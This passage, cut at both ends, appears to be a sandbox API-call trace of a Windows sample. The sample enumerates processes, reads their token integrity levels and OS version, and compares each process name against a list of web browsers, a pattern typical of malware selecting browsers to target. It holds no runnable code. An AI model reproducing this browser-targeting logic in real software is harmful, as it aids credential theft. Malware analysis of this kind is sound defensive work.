TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0218.252] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0218.252] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0218.252] CloseHandle (hObject=0xb8) returned 1 [0218.252] CloseHandle (hObject=0xb4) returned 1 [0218.253] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0218.253] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0218.253] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0218.253] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0218.253] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0218.253] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0218.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0xb4 [0218.253] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0218.253] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0218.253] GetLastError () returned 0x7a [0218.253] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0218.253] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0218.253] CloseHandle (hObject=0xb8) returned 1 [0218.253] CloseHandle (hObject=0xb4) returned 1 [0218.253] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0xb4 [0218.253] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x168628, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.253] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0218.253] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0218.253] GetLastError () returned 0x7a [0218.253] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0218.253] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0218.253] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0218.253] CloseHandle (hObject=0xb8) returned 1 [0218.253] CloseHandle (hObject=0xb4) returned 1 [0218.253] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0218.253] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0218.253] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0218.253] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0218.253] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0218.253] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0218.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xb4 [0218.253] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0218.253] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0218.253] GetLastError () returned 0x7a [0218.253] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0218.254] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0218.254] CloseHandle (hObject=0xb8) returned 1 [0218.254] CloseHandle (hObject=0xb4) returned 1 [0218.254] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xb4 [0218.254] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1687a8, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.254] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0218.254] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0218.254] GetLastError () returned 0x7a [0218.254] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0218.254] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0218.254] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0218.254] CloseHandle (hObject=0xb8) returned 1 [0218.254] CloseHandle (hObject=0xb4) returned 1 [0218.254] lstrcmpiW (lpString1="firefox.exe", lpString2="WINWORD.EXE") returned -1 [0218.254] lstrcmpiW (lpString1="chrome.exe", lpString2="WINWORD.EXE") returned -1 [0218.254] lstrcmpiW (lpString1="opera.exe", lpString2="WINWORD.EXE") returned -1 [0218.254] lstrcmpiW (lpString1="iexplore.exe", lpString2="WINWORD.EXE") returned -1 [0218.254] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="WINWORD.EXE") returned -1 [0218.254] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="WINWORD.EXE") returned -1 [0218.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0218.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0218.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0218.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0218.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0218.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x634) returned 0xb4 [0218.254] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0218.254] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0218.254] GetLastError () returned 0x7a [0218.254] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0218.254] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0218.254] CloseHandle (hObject=0xb8) returned 1 [0218.254] CloseHandle (hObject=0xb4) returned 1 [0218.254] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x634) returned 0xb4 [0218.255] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x168d80, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.255] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0218.255] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0218.255] GetLastError () returned 0x7a [0218.255] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0218.255] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0218.255] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0218.255] CloseHandle (hObject=0xb8) returned 1 [0218.255] CloseHandle (hObject=0xb4) returned 1 [0218.255] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0218.255] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0218.255] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0218.255] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0218.255] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0218.255] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0218.255] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0218.255] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0220.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x4bfd5c | out: SystemInformation=0x0, ResultLength=0x4bfd5c*=0xcb90) returned 0xc0000004 [0220.857] VirtualAlloc (lpAddress=0x0, dwSize=0xdb90, flAllocationType=0x1000, flProtect=0x4) returned 0x160000 [0220.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0xdb90, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0220.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0220.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0220.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0220.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0220.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0220.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0220.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0220.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0220.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0220.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0220.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0220.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0220.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0220.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0220.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0220.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0220.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0220.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0220.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0220.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0220.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0220.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0xb4 [0220.861] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0220.861] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0220.861] GetLastError () returned 0x7a [0220.861] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0220.861] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0220.862] CloseHandle (hObject=0xb8) returned 1 [0220.862] CloseHandle (hObject=0xb4) returned 1 [0220.862] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0xb4 [0220.862] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x169f28, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.862] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0220.862] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0220.862] GetLastError () returned 0x7a [0220.862] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0220.862] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0220.863] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0220.863] CloseHandle (hObject=0xb8) returned 1 [0220.863] CloseHandle (hObject=0xb4) returned 1 [0220.863] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0220.863] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0220.864] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0220.864] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0220.864] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0220.864] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0220.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0xb4 [0220.864] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0220.864] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0220.864] GetLastError () returned 0x7a [0220.864] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0220.864] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0220.864] CloseHandle (hObject=0xb8) returned 1 [0220.864] CloseHandle (hObject=0xb4) returned 1 [0220.865] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0xb4 [0220.865] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x166048, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.865] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0220.865] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0220.865] GetLastError () returned 0x7a [0220.865] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0220.865] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0220.865] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0220.865] CloseHandle (hObject=0xb8) returned 1 [0220.866] CloseHandle (hObject=0xb4) returned 1 [0220.866] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0220.866] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0220.866] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0220.866] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0220.866] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0220.867] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0220.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0xb4 [0220.867] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0220.867] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0220.867] GetLastError () returned 0x7a [0220.867] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0220.867] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0220.867] CloseHandle (hObject=0xb8) returned 1 [0220.867] CloseHandle (hObject=0xb4) returned 1 [0220.867] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0xb4 [0220.868] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x166220, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.868] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0220.868] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0220.868] GetLastError () returned 0x7a [0220.868] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0220.868] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0220.868] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0220.868] CloseHandle (hObject=0xb8) returned 1 [0220.868] CloseHandle (hObject=0xb4) returned 1 [0220.869] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0220.869] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0220.869] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0220.869] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0220.869] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0220.869] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0220.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0220.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0220.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0220.870] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0220.870] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0220.870] GetLastError () returned 0x7a [0220.870] GetTokenInformation (in: 